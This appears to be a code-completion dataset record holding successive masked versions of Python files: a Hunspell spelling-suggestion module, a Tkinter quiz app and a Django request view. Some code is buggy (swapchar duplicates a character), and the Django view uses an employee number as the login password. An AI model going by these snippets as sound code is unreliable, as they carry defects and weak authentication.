layout (\"vat -> cat\")\n or downcased (if it was accidental uppercase).\n\n Uses :attr:`aff.KEY <spylls.hunspell.data.aff.Aff.KEY>`\n \"\"\"\n for i, c in enumerate(word):\n before = word[:i]\n after = word[i + 1:]\n if c != c.upper():\n yield before + c.upper() + after\n if not layout:\n continue\n pos = layout.find(c)\n while pos != -1:\n if pos > 0 and layout[pos - 1] != '|':\n yield before + layout[pos - 1] + after\n if pos + 1 < len(layout) and layout[pos + 1] != '|':\n yield before + layout[pos + 1] + after\n pos = layout.find(c, pos + 1)\n\n\ndef extrachar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one char removed in all possible positions\n \"\"\"\n if len(word) < 2:\n return\n for i in range(0, len(word)):\n yield word[:i] + word[i + 1:]\n\n\ndef forgotchar(word: str, trystring: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one char inserted in all possible possitions.\n\n List of chars is taken from :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>` -- if it is absent,\n doesn't try anything! Chars there are expected to be sorted in order of chars usage in language\n (most used characters first).\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in range(0, len(word)):\n yield word[:i] + c + word[i:]\n\n\ndef movechar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one character moved by 2, 3 or 4 places forward or backward (not 1,\n because it is already handled by :meth:`swapchar`)\n \"\"\"\n if len(word) < 2:\n return\n for frompos, char in enumerate(word):\n for topos in range(frompos + 3, min(len(word), frompos +\n MAX_CHAR_DISTANCE + 1)):\n yield word[:frompos] + word[frompos + 1:topos] + char + word[topos:\n ]\n for frompos in reversed(range(0, len(word))):\n for topos in reversed(range(max(0, frompos - MAX_CHAR_DISTANCE + 1),\n frompos - 1)):\n yield word[:topos] + word[frompos] + word[topos:frompos] + word[\n frompos + 1:]\n\n\ndef badchar(word: str, trystring: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by chars in :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>`\n set.\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in reversed(range(0, len(word))):\n if word[i] == c:\n continue\n yield word[:i] + c + word[i + 1:]\n\n\ndef doubletwochars(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with accidental two-letter-doubling fixed (vacation -> vacacation)\n \"\"\"\n if len(word) < 5:\n return\n for i in range(2, len(word)):\n if word[i - 2] == word[i] and word[i - 3] == word[i - 1]:\n yield word[:i - 1] + word[i + 1:]\n\n\ndef twowords(word: str) ->Iterator[List[str]]:\n \"\"\"\n Produces permutation of splitting in two words in all possible positions.\n \"\"\"\n for i in range(1, len(word)):\n yield [word[:i], word[i:]]\n",
"step-4": "<mask token>\nfrom typing import Iterator, Union, List, Set\nfrom spylls.hunspell.data import aff\nMAX_CHAR_DISTANCE = 4\n\n\ndef replchars(word: str, reptable: List[aff.RepPattern]) ->Iterator[Union[\n str, List[str]]]:\n \"\"\"\n Uses :attr:`aff.REP <spylls.hunspell.data.aff.Aff.REP>` table (typical misspellings) to replace\n in the word provided. If the pattern's replacement contains \"_\", it means replacing to \" \" and\n yielding _two_ different hypotheses: it was one (dictionary) word \"foo bar\" (and should be\n checked as such) or it was words [\"foo\", \"bar\"] and should be checked separately.\n \"\"\"\n if len(word) < 2 or not reptable:\n return\n for pattern in reptable:\n for match in pattern.regexp.finditer(word):\n suggestion = word[:match.start()] + pattern.replacement.replace('_'\n , ' ') + word[match.end():]\n yield suggestion\n if ' ' in suggestion:\n yield suggestion.split(' ', 2)\n\n\ndef mapchars(word: str, maptable: List[Set[str]]) ->Iterator[str]:\n \"\"\"\n Uses :attr:`aff.MAP <spylls.hunspell.data.aff.Aff.MAP>` table ( sets of potentially similar chars)\n and tries to replace them recursively. E.g., assuming ``MAP`` has entry ``aáã``, and we have\n a misspelling \"anarchia\", ``mapchars`` will do this:\n\n >>> [*pmt.mapchars(\"anarchia\", ['aáã'])]\n ['ánarchia',\n 'ánárchia',\n 'ánárchiá',\n 'ánárchiã',\n 'ánãrchia',\n 'ánãrchiá',\n 'ánãrchiã',\n 'ãnarchia',\n 'ãnárchia',\n 'ãnárchiá',\n 'ãnárchiã',\n 'ãnãrchia',\n 'ãnãrchiá',\n 'ãnãrchiã']\n \"\"\"\n if len(word) < 2 or not maptable:\n return\n\n def mapchars_internal(word, start=0):\n if start >= len(word):\n return\n for options in maptable:\n for option in options:\n pos = word.find(option, start)\n if pos != -1:\n for other in options:\n if other == option:\n continue\n replaced = word[:pos] + other + word[pos + len(option):\n ]\n yield replaced\n for variant in mapchars_internal(replaced, pos + 1):\n yield variant\n for variant in mapchars_internal(word):\n yield variant\n\n\ndef swapchar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with adjacent chars swapped. For short (4 or 5 letters) words produces\n also doubleswaps: ahev -> have.\n \"\"\"\n if len(word) < 2:\n return\n for i in range(0, len(word) - 1):\n yield word[:i] + word[i + 1] + word[i + 1] + word[i + 2:]\n if len(word) in [4, 5]:\n yield word[1] + word[0] + (word[2] if len(word) == 5 else '') + word[-1\n ] + word[-2]\n if len(word) == 5:\n yield word[0] + word[2] + word[1] + word[-1] + word[-2]\n\n\ndef longswapchar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with non-adjacent chars swapped (up to 4 chars distance)\n \"\"\"\n for first in range(0, len(word) - 2):\n for second in range(first + 2, min(first + MAX_CHAR_DISTANCE, len(\n word))):\n yield word[:first] + word[second] + word[first + 1:second] + word[\n first] + word[second + 1:]\n\n\ndef badcharkey(word: str, layout: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by adjacent chars on keyboard layout (\"vat -> cat\")\n or downcased (if it was accidental uppercase).\n\n Uses :attr:`aff.KEY <spylls.hunspell.data.aff.Aff.KEY>`\n \"\"\"\n for i, c in enumerate(word):\n before = word[:i]\n after = word[i + 1:]\n if c != c.upper():\n yield before + c.upper() + after\n if not layout:\n continue\n pos = layout.find(c)\n while pos != -1:\n if pos > 0 and layout[pos - 1] != '|':\n yield before + layout[pos - 1] + after\n if pos + 1 < len(layout) and layout[pos + 1] != '|':\n yield before + layout[pos + 1] + after\n pos = layout.find(c, pos + 1)\n\n\ndef extrachar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one char removed in all possible positions\n \"\"\"\n if len(word) < 2:\n return\n for i in range(0, len(word)):\n yield word[:i] + word[i + 1:]\n\n\ndef forgotchar(word: str, trystring: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one char inserted in all possible possitions.\n\n List of chars is taken from :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>` -- if it is absent,\n doesn't try anything! Chars there are expected to be sorted in order of chars usage in language\n (most used characters first).\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in range(0, len(word)):\n yield word[:i] + c + word[i:]\n\n\ndef movechar(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with one character moved by 2, 3 or 4 places forward or backward (not 1,\n because it is already handled by :meth:`swapchar`)\n \"\"\"\n if len(word) < 2:\n return\n for frompos, char in enumerate(word):\n for topos in range(frompos + 3, min(len(word), frompos +\n MAX_CHAR_DISTANCE + 1)):\n yield word[:frompos] + word[frompos + 1:topos] + char + word[topos:\n ]\n for frompos in reversed(range(0, len(word))):\n for topos in reversed(range(max(0, frompos - MAX_CHAR_DISTANCE + 1),\n frompos - 1)):\n yield word[:topos] + word[frompos] + word[topos:frompos] + word[\n frompos + 1:]\n\n\ndef badchar(word: str, trystring: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by chars in :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>`\n set.\n \"\"\"\n if not trystring:\n return\n for c in trystring:\n for i in reversed(range(0, len(word))):\n if word[i] == c:\n continue\n yield word[:i] + c + word[i + 1:]\n\n\ndef doubletwochars(word: str) ->Iterator[str]:\n \"\"\"\n Produces permutations with accidental two-letter-doubling fixed (vacation -> vacacation)\n \"\"\"\n if len(word) < 5:\n return\n for i in range(2, len(word)):\n if word[i - 2] == word[i] and word[i - 3] == word[i - 1]:\n yield word[:i - 1] + word[i + 1:]\n\n\ndef twowords(word: str) ->Iterator[List[str]]:\n \"\"\"\n Produces permutation of splitting in two words in all possible positions.\n \"\"\"\n for i in range(1, len(word)):\n yield [word[:i], word[i:]]\n",
"step-5": "\"\"\"\nNote: names of methods in this module, if seem weird, are the same as in Hunspell's ``suggest.cxx``\nto keep track of them.\n\"\"\"\n\nfrom typing import Iterator, Union, List, Set\n\nfrom spylls.hunspell.data import aff\n\n\nMAX_CHAR_DISTANCE = 4\n\n\ndef replchars(word: str, reptable: List[aff.RepPattern]) -> Iterator[Union[str, List[str]]]:\n \"\"\"\n Uses :attr:`aff.REP <spylls.hunspell.data.aff.Aff.REP>` table (typical misspellings) to replace\n in the word provided. If the pattern's replacement contains \"_\", it means replacing to \" \" and\n yielding _two_ different hypotheses: it was one (dictionary) word \"foo bar\" (and should be\n checked as such) or it was words [\"foo\", \"bar\"] and should be checked separately.\n \"\"\"\n\n if len(word) < 2 or not reptable:\n return\n\n for pattern in reptable:\n # TODO: compiled at aff loading\n for match in pattern.regexp.finditer(word):\n suggestion = word[:match.start()] + pattern.replacement.replace('_', ' ') + word[match.end():]\n yield suggestion\n if ' ' in suggestion:\n yield suggestion.split(' ', 2)\n\n\ndef mapchars(word: str, maptable: List[Set[str]]) -> Iterator[str]:\n \"\"\"\n Uses :attr:`aff.MAP <spylls.hunspell.data.aff.Aff.MAP>` table ( sets of potentially similar chars)\n and tries to replace them recursively. E.g., assuming ``MAP`` has entry ``aáã``, and we have\n a misspelling \"anarchia\", ``mapchars`` will do this:\n\n >>> [*pmt.mapchars(\"anarchia\", ['aáã'])]\n ['ánarchia',\n 'ánárchia',\n 'ánárchiá',\n 'ánárchiã',\n 'ánãrchia',\n 'ánãrchiá',\n 'ánãrchiã',\n 'ãnarchia',\n 'ãnárchia',\n 'ãnárchiá',\n 'ãnárchiã',\n 'ãnãrchia',\n 'ãnãrchiá',\n 'ãnãrchiã']\n \"\"\"\n\n if len(word) < 2 or not maptable:\n return\n\n def mapchars_internal(word, start=0):\n if start >= len(word):\n return\n\n for options in maptable:\n for option in options:\n pos = word.find(option, start)\n if pos != -1:\n for other in options:\n if other == option:\n continue\n replaced = word[:pos] + other + word[pos+len(option):]\n yield replaced\n for variant in mapchars_internal(replaced, pos + 1):\n yield variant\n\n for variant in mapchars_internal(word):\n yield variant\n\n\ndef swapchar(word: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with adjacent chars swapped. For short (4 or 5 letters) words produces\n also doubleswaps: ahev -> have.\n \"\"\"\n\n if len(word) < 2:\n return\n\n for i in range(0, len(word) - 1):\n yield word[:i] + word[i+1] + word[i+1] + word[i+2:]\n\n # try double swaps for short words\n # ahev -> have, owudl -> would\n if len(word) in [4, 5]:\n yield word[1] + word[0] + (word[2] if len(word) == 5 else '') + word[-1] + word[-2]\n if len(word) == 5:\n yield word[0] + word[2] + word[1] + word[-1] + word[-2]\n\n\ndef longswapchar(word: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with non-adjacent chars swapped (up to 4 chars distance)\n \"\"\"\n\n for first in range(0, len(word) - 2):\n for second in range(first + 2, min(first + MAX_CHAR_DISTANCE, len(word))):\n yield word[:first] + word[second] + word[first+1:second] + word[first] + word[second+1:]\n\n\ndef badcharkey(word: str, layout: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by adjacent chars on keyboard layout (\"vat -> cat\")\n or downcased (if it was accidental uppercase).\n\n Uses :attr:`aff.KEY <spylls.hunspell.data.aff.Aff.KEY>`\n \"\"\"\n\n for i, c in enumerate(word):\n before = word[:i]\n after = word[i+1:]\n if c != c.upper():\n yield before + c.upper() + after\n\n if not layout:\n continue\n\n pos = layout.find(c)\n while pos != -1:\n if pos > 0 and layout[pos-1] != '|':\n yield before + layout[pos-1] + after\n if pos + 1 < len(layout) and layout[pos+1] != '|':\n yield before + layout[pos+1] + after\n pos = layout.find(c, pos+1)\n\n\ndef extrachar(word: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with one char removed in all possible positions\n \"\"\"\n if len(word) < 2:\n return\n\n for i in range(0, len(word)):\n yield word[:i] + word[i+1:]\n\n\ndef forgotchar(word: str, trystring: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with one char inserted in all possible possitions.\n\n List of chars is taken from :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>` -- if it is absent,\n doesn't try anything! Chars there are expected to be sorted in order of chars usage in language\n (most used characters first).\n \"\"\"\n\n if not trystring:\n return\n\n for c in trystring:\n for i in range(0, len(word)):\n yield word[:i] + c + word[i:]\n\n\ndef movechar(word: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with one character moved by 2, 3 or 4 places forward or backward (not 1,\n because it is already handled by :meth:`swapchar`)\n \"\"\"\n\n if len(word) < 2:\n return\n\n for frompos, char in enumerate(word):\n for topos in range(frompos + 3, min(len(word), frompos + MAX_CHAR_DISTANCE + 1)):\n yield word[:frompos] + word[frompos+1:topos] + char + word[topos:]\n\n for frompos in reversed(range(0, len(word))):\n for topos in reversed(range(max(0, frompos - MAX_CHAR_DISTANCE + 1), frompos - 1)):\n yield word[:topos] + word[frompos] + word[topos:frompos] + word[frompos+1:]\n\n\ndef badchar(word: str, trystring: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with chars replaced by chars in :attr:`aff.TRY <spylls.hunspell.data.aff.Aff.TRY>`\n set.\n \"\"\"\n\n if not trystring:\n return\n\n for c in trystring:\n for i in reversed(range(0, len(word))):\n if word[i] == c:\n continue\n yield word[:i] + c + word[i+1:]\n\n\ndef doubletwochars(word: str) -> Iterator[str]:\n \"\"\"\n Produces permutations with accidental two-letter-doubling fixed (vacation -> vacacation)\n \"\"\"\n\n if len(word) < 5:\n return\n\n # TODO: 1) for vacacation yields \"vacation\" twice, hunspell's algo kinda wiser\n # 2) maybe just use regexp?..\n for i in range(2, len(word)):\n if word[i-2] == word[i] and word[i-3] == word[i-1]:\n yield word[:i-1] + word[i+1:]\n\n\ndef twowords(word: str) -> Iterator[List[str]]:\n \"\"\"\n Produces permutation of splitting in two words in all possible positions.\n \"\"\"\n\n for i in range(1, len(word)):\n yield [word[:i], word[i:]]\n",
"step-ids": [
6,
9,
12,
13,
14
]
}
|
[
6,
9,
12,
13,
14
] |
import tkinter as tk
from tkinter import ttk, messagebox, Menu
ventana = tk.Tk()
EntryArr = []
Label = ["¿Que es la analisis psicologico?", "¿Como se lee la mente?", "¿Cuantas persepciones psicologicas existen?", "¿Padre de la Psicologia moderna?", "Parte del cuerpo donde esta la psyco"]
Arr3 = tk.IntVar()
opciones1 = ["1", "2","5"]
opciones2 = ["John Lenon", "Leon Borrego", "Jefry", "mxrio"]
opciones3 = ["Cabeza", "mente", "Pecho", "corazon", "Manos"]
respuesta = dict.fromkeys(opciones3, None)
def grid(Component, col, row1, padx1, pady1):
Component.grid(column=col, row=row1, padx=padx1, pady=pady1)
def click():
i = 0
cal = 0
info = ""
for x in EntryArr:
if not x.get():
messagebox.showinfo("Error","Campos no llenos")
return
else:
info += (f"{Label[i]}\t{x.get()}"+ "\n")
cal = 40
i+= 1
if(Arr3.get() == 1):
cal+= 20
if (Arr4.get() == 2):
cal+= 20
messagebox.showinfo("resultados","Tu calificaion es"+ str(cal) )
Arr3 = tk.IntVar()
Arr4 = tk.IntVar()
def edicion1():
indice = 0
for i in range(0,2):
EntryArr.append(tk.StringVar())
grid(
ttk.Entry(ventana, textvariable=EntryArr[indice]), 1, indice, 10, 10)
grid(ttk.Label(ventana, text=Label[i]), 0, indice, 10, 10)
indice += 1
grid(ttk.Label(ventana, text=Label[2]), 0, indice, 10, 10)
icol = 1
Arr3 = tk.IntVar()
for i in range(0,3):
grid(ttk.Radiobutton(ventana, text = opciones1[i], variable=Arr3, value = i), icol, 2, 5, 5)
icol +=1
icol = 1
grid(ttk.Label(ventana, text=Label[3]), 0, 3, 10, 10)
for i in range(0,4):
grid(ttk.Radiobutton(ventana, text = opciones2[i], variable=Arr4, value = i), icol, 3, 5, 5)
icol +=1
# Botton
grid(ttk.Label(ventana, text=Label[4]), 0, 4, 10, 10)
icol = 0
for key in respuesta:
respuesta[key] = tk.IntVar()
ttk.Checkbutton(ventana, text = key, variable = respuesta[key]).grid(row = 5, column = icol)
icol = icol + 1
Botton = tk.Button(ventana, text="Aceptar", command = click)
grid(Botton, 2, 10, 10, 10)
def main():
edicion1()
ventana.mainloop()
main()
|
normal
|
{
"blob_id": "aeab80e2d0006ffa938366ef046d2ab3d387f88c",
"index": 1152,
"step-1": "<mask token>\n\n\ndef click():\n i = 0\n cal = 0\n info = ''\n for x in EntryArr:\n if not x.get():\n messagebox.showinfo('Error', 'Campos no llenos')\n return\n else:\n info += f'{Label[i]}\\t{x.get()}' + '\\n'\n cal = 40\n i += 1\n if Arr3.get() == 1:\n cal += 20\n if Arr4.get() == 2:\n cal += 20\n messagebox.showinfo('resultados', 'Tu calificaion es' + str(cal))\n\n\n<mask token>\n\n\ndef edicion1():\n indice = 0\n for i in range(0, 2):\n EntryArr.append(tk.StringVar())\n grid(ttk.Entry(ventana, textvariable=EntryArr[indice]), 1, indice, \n 10, 10)\n grid(ttk.Label(ventana, text=Label[i]), 0, indice, 10, 10)\n indice += 1\n grid(ttk.Label(ventana, text=Label[2]), 0, indice, 10, 10)\n icol = 1\n Arr3 = tk.IntVar()\n for i in range(0, 3):\n grid(ttk.Radiobutton(ventana, text=opciones1[i], variable=Arr3,\n value=i), icol, 2, 5, 5)\n icol += 1\n icol = 1\n grid(ttk.Label(ventana, text=Label[3]), 0, 3, 10, 10)\n for i in range(0, 4):\n grid(ttk.Radiobutton(ventana, text=opciones2[i], variable=Arr4,\n value=i), icol, 3, 5, 5)\n icol += 1\n grid(ttk.Label(ventana, text=Label[4]), 0, 4, 10, 10)\n icol = 0\n for key in respuesta:\n respuesta[key] = tk.IntVar()\n ttk.Checkbutton(ventana, text=key, variable=respuesta[key]).grid(row\n =5, column=icol)\n icol = icol + 1\n Botton = tk.Button(ventana, text='Aceptar', command=click)\n grid(Botton, 2, 10, 10, 10)\n\n\ndef main():\n edicion1()\n ventana.mainloop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef grid(Component, col, row1, padx1, pady1):\n Component.grid(column=col, row=row1, padx=padx1, pady=pady1)\n\n\ndef click():\n i = 0\n cal = 0\n info = ''\n for x in EntryArr:\n if not x.get():\n messagebox.showinfo('Error', 'Campos no llenos')\n return\n else:\n info += f'{Label[i]}\\t{x.get()}' + '\\n'\n cal = 40\n i += 1\n if Arr3.get() == 1:\n cal += 20\n if Arr4.get() == 2:\n cal += 20\n messagebox.showinfo('resultados', 'Tu calificaion es' + str(cal))\n\n\n<mask token>\n\n\ndef edicion1():\n indice = 0\n for i in range(0, 2):\n EntryArr.append(tk.StringVar())\n grid(ttk.Entry(ventana, textvariable=EntryArr[indice]), 1, indice, \n 10, 10)\n grid(ttk.Label(ventana, text=Label[i]), 0, indice, 10, 10)\n indice += 1\n grid(ttk.Label(ventana, text=Label[2]), 0, indice, 10, 10)\n icol = 1\n Arr3 = tk.IntVar()\n for i in range(0, 3):\n grid(ttk.Radiobutton(ventana, text=opciones1[i], variable=Arr3,\n value=i), icol, 2, 5, 5)\n icol += 1\n icol = 1\n grid(ttk.Label(ventana, text=Label[3]), 0, 3, 10, 10)\n for i in range(0, 4):\n grid(ttk.Radiobutton(ventana, text=opciones2[i], variable=Arr4,\n value=i), icol, 3, 5, 5)\n icol += 1\n grid(ttk.Label(ventana, text=Label[4]), 0, 4, 10, 10)\n icol = 0\n for key in respuesta:\n respuesta[key] = tk.IntVar()\n ttk.Checkbutton(ventana, text=key, variable=respuesta[key]).grid(row\n =5, column=icol)\n icol = icol + 1\n Botton = tk.Button(ventana, text='Aceptar', command=click)\n grid(Botton, 2, 10, 10, 10)\n\n\ndef main():\n edicion1()\n ventana.mainloop()\n\n\nmain()\n",
"step-3": "<mask token>\nventana = tk.Tk()\nEntryArr = []\nLabel = ['¿Que es la analisis psicologico?', '¿Como se lee la mente?',\n '¿Cuantas persepciones psicologicas existen?',\n '¿Padre de la Psicologia moderna?', 'Parte del cuerpo donde esta la psyco']\nArr3 = tk.IntVar()\nopciones1 = ['1', '2', '5']\nopciones2 = ['John Lenon', 'Leon Borrego', 'Jefry', 'mxrio']\nopciones3 = ['Cabeza', 'mente', 'Pecho', 'corazon', 'Manos']\nrespuesta = dict.fromkeys(opciones3, None)\n\n\ndef grid(Component, col, row1, padx1, pady1):\n Component.grid(column=col, row=row1, padx=padx1, pady=pady1)\n\n\ndef click():\n i = 0\n cal = 0\n info = ''\n for x in EntryArr:\n if not x.get():\n messagebox.showinfo('Error', 'Campos no llenos')\n return\n else:\n info += f'{Label[i]}\\t{x.get()}' + '\\n'\n cal = 40\n i += 1\n if Arr3.get() == 1:\n cal += 20\n if Arr4.get() == 2:\n cal += 20\n messagebox.showinfo('resultados', 'Tu calificaion es' + str(cal))\n\n\nArr3 = tk.IntVar()\nArr4 = tk.IntVar()\n\n\ndef edicion1():\n indice = 0\n for i in range(0, 2):\n EntryArr.append(tk.StringVar())\n grid(ttk.Entry(ventana, textvariable=EntryArr[indice]), 1, indice, \n 10, 10)\n grid(ttk.Label(ventana, text=Label[i]), 0, indice, 10, 10)\n indice += 1\n grid(ttk.Label(ventana, text=Label[2]), 0, indice, 10, 10)\n icol = 1\n Arr3 = tk.IntVar()\n for i in range(0, 3):\n grid(ttk.Radiobutton(ventana, text=opciones1[i], variable=Arr3,\n value=i), icol, 2, 5, 5)\n icol += 1\n icol = 1\n grid(ttk.Label(ventana, text=Label[3]), 0, 3, 10, 10)\n for i in range(0, 4):\n grid(ttk.Radiobutton(ventana, text=opciones2[i], variable=Arr4,\n value=i), icol, 3, 5, 5)\n icol += 1\n grid(ttk.Label(ventana, text=Label[4]), 0, 4, 10, 10)\n icol = 0\n for key in respuesta:\n respuesta[key] = tk.IntVar()\n ttk.Checkbutton(ventana, text=key, variable=respuesta[key]).grid(row\n =5, column=icol)\n icol = icol + 1\n Botton = tk.Button(ventana, text='Aceptar', command=click)\n grid(Botton, 2, 10, 10, 10)\n\n\ndef main():\n edicion1()\n ventana.mainloop()\n\n\nmain()\n",
"step-4": "import tkinter as tk\nfrom tkinter import ttk, messagebox, Menu\nventana = tk.Tk()\nEntryArr = []\nLabel = ['¿Que es la analisis psicologico?', '¿Como se lee la mente?',\n '¿Cuantas persepciones psicologicas existen?',\n '¿Padre de la Psicologia moderna?', 'Parte del cuerpo donde esta la psyco']\nArr3 = tk.IntVar()\nopciones1 = ['1', '2', '5']\nopciones2 = ['John Lenon', 'Leon Borrego', 'Jefry', 'mxrio']\nopciones3 = ['Cabeza', 'mente', 'Pecho', 'corazon', 'Manos']\nrespuesta = dict.fromkeys(opciones3, None)\n\n\ndef grid(Component, col, row1, padx1, pady1):\n Component.grid(column=col, row=row1, padx=padx1, pady=pady1)\n\n\ndef click():\n i = 0\n cal = 0\n info = ''\n for x in EntryArr:\n if not x.get():\n messagebox.showinfo('Error', 'Campos no llenos')\n return\n else:\n info += f'{Label[i]}\\t{x.get()}' + '\\n'\n cal = 40\n i += 1\n if Arr3.get() == 1:\n cal += 20\n if Arr4.get() == 2:\n cal += 20\n messagebox.showinfo('resultados', 'Tu calificaion es' + str(cal))\n\n\nArr3 = tk.IntVar()\nArr4 = tk.IntVar()\n\n\ndef edicion1():\n indice = 0\n for i in range(0, 2):\n EntryArr.append(tk.StringVar())\n grid(ttk.Entry(ventana, textvariable=EntryArr[indice]), 1, indice, \n 10, 10)\n grid(ttk.Label(ventana, text=Label[i]), 0, indice, 10, 10)\n indice += 1\n grid(ttk.Label(ventana, text=Label[2]), 0, indice, 10, 10)\n icol = 1\n Arr3 = tk.IntVar()\n for i in range(0, 3):\n grid(ttk.Radiobutton(ventana, text=opciones1[i], variable=Arr3,\n value=i), icol, 2, 5, 5)\n icol += 1\n icol = 1\n grid(ttk.Label(ventana, text=Label[3]), 0, 3, 10, 10)\n for i in range(0, 4):\n grid(ttk.Radiobutton(ventana, text=opciones2[i], variable=Arr4,\n value=i), icol, 3, 5, 5)\n icol += 1\n grid(ttk.Label(ventana, text=Label[4]), 0, 4, 10, 10)\n icol = 0\n for key in respuesta:\n respuesta[key] = tk.IntVar()\n ttk.Checkbutton(ventana, text=key, variable=respuesta[key]).grid(row\n =5, column=icol)\n icol = icol + 1\n Botton = tk.Button(ventana, text='Aceptar', command=click)\n grid(Botton, 2, 10, 10, 10)\n\n\ndef main():\n edicion1()\n ventana.mainloop()\n\n\nmain()\n",
"step-5": "import tkinter as tk\nfrom tkinter import ttk, messagebox, Menu\n\n\nventana = tk.Tk()\nEntryArr = []\nLabel = [\"¿Que es la analisis psicologico?\", \"¿Como se lee la mente?\", \"¿Cuantas persepciones psicologicas existen?\", \"¿Padre de la Psicologia moderna?\", \"Parte del cuerpo donde esta la psyco\"]\nArr3 = tk.IntVar()\nopciones1 = [\"1\", \"2\",\"5\"]\nopciones2 = [\"John Lenon\", \"Leon Borrego\", \"Jefry\", \"mxrio\"]\nopciones3 = [\"Cabeza\", \"mente\", \"Pecho\", \"corazon\", \"Manos\"]\nrespuesta = dict.fromkeys(opciones3, None)\n\ndef grid(Component, col, row1, padx1, pady1):\n Component.grid(column=col, row=row1, padx=padx1, pady=pady1)\n\ndef click():\n i = 0\n cal = 0\n info = \"\"\n for x in EntryArr:\n if not x.get():\n messagebox.showinfo(\"Error\",\"Campos no llenos\")\n return\n else: \n info += (f\"{Label[i]}\\t{x.get()}\"+ \"\\n\")\n cal = 40\n i+= 1\n\n if(Arr3.get() == 1):\n cal+= 20\n if (Arr4.get() == 2):\n cal+= 20\n messagebox.showinfo(\"resultados\",\"Tu calificaion es\"+ str(cal) )\n\n\n\nArr3 = tk.IntVar()\nArr4 = tk.IntVar()\n\n\n\ndef edicion1():\n \n indice = 0\n for i in range(0,2):\n EntryArr.append(tk.StringVar())\n grid(\n ttk.Entry(ventana, textvariable=EntryArr[indice]), 1, indice, 10, 10)\n grid(ttk.Label(ventana, text=Label[i]), 0, indice, 10, 10)\n indice += 1\n grid(ttk.Label(ventana, text=Label[2]), 0, indice, 10, 10)\n icol = 1\n Arr3 = tk.IntVar()\n for i in range(0,3):\n grid(ttk.Radiobutton(ventana, text = opciones1[i], variable=Arr3, value = i), icol, 2, 5, 5)\n icol +=1\n \n icol = 1\n grid(ttk.Label(ventana, text=Label[3]), 0, 3, 10, 10)\n for i in range(0,4):\n grid(ttk.Radiobutton(ventana, text = opciones2[i], variable=Arr4, value = i), icol, 3, 5, 5)\n icol +=1\n # Botton\n grid(ttk.Label(ventana, text=Label[4]), 0, 4, 10, 10)\n icol = 0\n for key in respuesta:\n respuesta[key] = tk.IntVar()\n ttk.Checkbutton(ventana, text = key, variable = respuesta[key]).grid(row = 5, column = icol)\n icol = icol + 1 \n\n\n Botton = tk.Button(ventana, text=\"Aceptar\", command = click)\n grid(Botton, 2, 10, 10, 10)\n\n\n\n\ndef main():\n edicion1()\n ventana.mainloop()\n\n\nmain()\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
# -*- coding: utf-8 -*-
from django.contrib.auth import logout, login, authenticate
from django.contrib.auth.models import User
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.middleware.csrf import get_token
from django.template.context import Context
from django.utils.translation import ugettext_lazy as _
from account.models import Employee
from amortization import settings
from models import MenuItem
from task.forms import RequestForm
from task.models import Request, Task
__author__ = 'cm'
from django.template.loader import get_template
def base_context(request):
author = settings.ADMINS[0][0]
version = settings.VERSION
csrf_token = get_token(request)
media_url = settings.MEDIA_URL
app_name = _('Amortization & Expertise')
path = request.path
logout = False
employee = None
usr = request.user
menu = MenuItem.objects.filter(for_staff=False).order_by('order')
if usr.is_authenticated():
logout = True
employee = Employee.objects.filter(user=usr)
if employee:
employee = employee[0]
if employee.user.is_staff:
menu = MenuItem.objects.order_by('order')
return locals()
def main(request):
c = base_context(request)
template = get_template("index.html")
c['title'] = _('Request')
form = RequestForm()
# if user is authenticated
user = request.user
c['user'] = user
if user.is_authenticated():
e = Employee.objects.filter(user=user)
if e:
empl = e[0]
form = RequestForm(initial={'fio': empl.fio, 'tab_number': empl.tab_number, 'post': empl.post, 'cabinet': empl.cabinet})
c['logout'] = True
c['form'] = form
if request.method == 'POST':
postdata = request.POST.copy()
form = RequestForm(request.POST)
if form.is_valid():
empl = Employee.objects.filter(tab_number = postdata.get('tab_number', 0))
if not empl:
# django user ---
if user.is_authenticated():
# logout
logout(request)
username = postdata.get('fio', 'error!')
password = postdata.get('tab_number', 0)
User.objects.create_user(username, '[email protected]', password)
# login
new_user = authenticate(username=username, password=password)
if new_user:
login(request, new_user)
# amortization user
empl = Employee()
empl.tab_number = postdata.get('tab_number', 0)
empl.fio = postdata.get('fio', "error!")
empl.user = new_user
empl.post = postdata.get('post', '')
empl.cabinet = postdata.get('cabinet', '0-000')
empl.save()
uid = empl
else:
uid = empl[0]
user = authenticate(username=uid.user.username, password=uid.tab_number)
if user:
login(request, user)
req = Request()
req.user = uid
req.number = postdata.get('number', '000000000000')
req.device = postdata.get('device', 'NoName')
req.serial = postdata.get('serial', '')
req.year = postdata.get('year', '----')
req.save()
c['saved'] = True
else:
c['form'] = form
return HttpResponse(template.render(Context(c)))
|
normal
|
{
"blob_id": "11163dc99ee65ab44494c08d81e110e9c42390ae",
"index": 3130,
